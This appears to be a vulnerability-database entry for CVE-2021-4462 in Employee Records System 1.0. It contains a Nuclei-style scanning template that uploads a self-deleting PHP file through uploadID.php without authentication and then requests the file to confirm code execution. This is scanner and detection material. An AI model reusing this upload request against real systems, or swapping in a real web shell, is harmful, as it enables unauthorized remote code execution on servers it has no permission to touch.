漏洞描述
Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
CVE-2021-4462: Employee Records System 1.0 - Unauthenticated File Upload RCE
PoC代码[已公开]
id: CVE-2021-4462
info:
name: Employee Records System 1.0 - Unauthenticated File Upload RCE
author: josephttd
severity: critical
description: |
Employee Records System version 1.0 contains an unrestricted file upload vulnerability in uploadID.php that allows remote unauthenticated attackers to upload arbitrary PHP files and achieve remote code execution.
reference:
- https://www.exploit-db.com/exploits/49596
- https://www.sourcecodester.com/php/11393/employee-records-system.html
classification:
cvss-score: 9.8
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cwe-id: CWE-434
epss-score: 0.12728
epss-percentile: 0.93737
metadata:
verified: true
max-request: 2
tags: cve,cve2021,employee-records,fileupload,rce,intrusive,vkev
variables:
string: "CVE-2021-4462"
filename: "{{to_lower(rand_base(5))}}.php"
http:
- raw:
- |
POST /dashboard/uploadID.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="employee_ID"; filename="{{filename}}"
Content-Type: image/png
<?php echo md5("{{string}}");unlink(__FILE__); ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
- |
GET /uploads/employees_ids/{{upload_filename}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: upload_filename
part: body
internal: true
group: 1
regex:
- '"upload_filename":"([^"]+)"'
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "{{md5(string)}}")'
condition: and
# digest: 4a0a0047304502201dec2684b6fe604883a0fa98e17c039532589a62a2f66706babede192528a465022100ef46641a6fa1eacc08376874175431464b87fb71fce5a95a386dd6027955391d:922c64590222798bb761d5b6d8e72950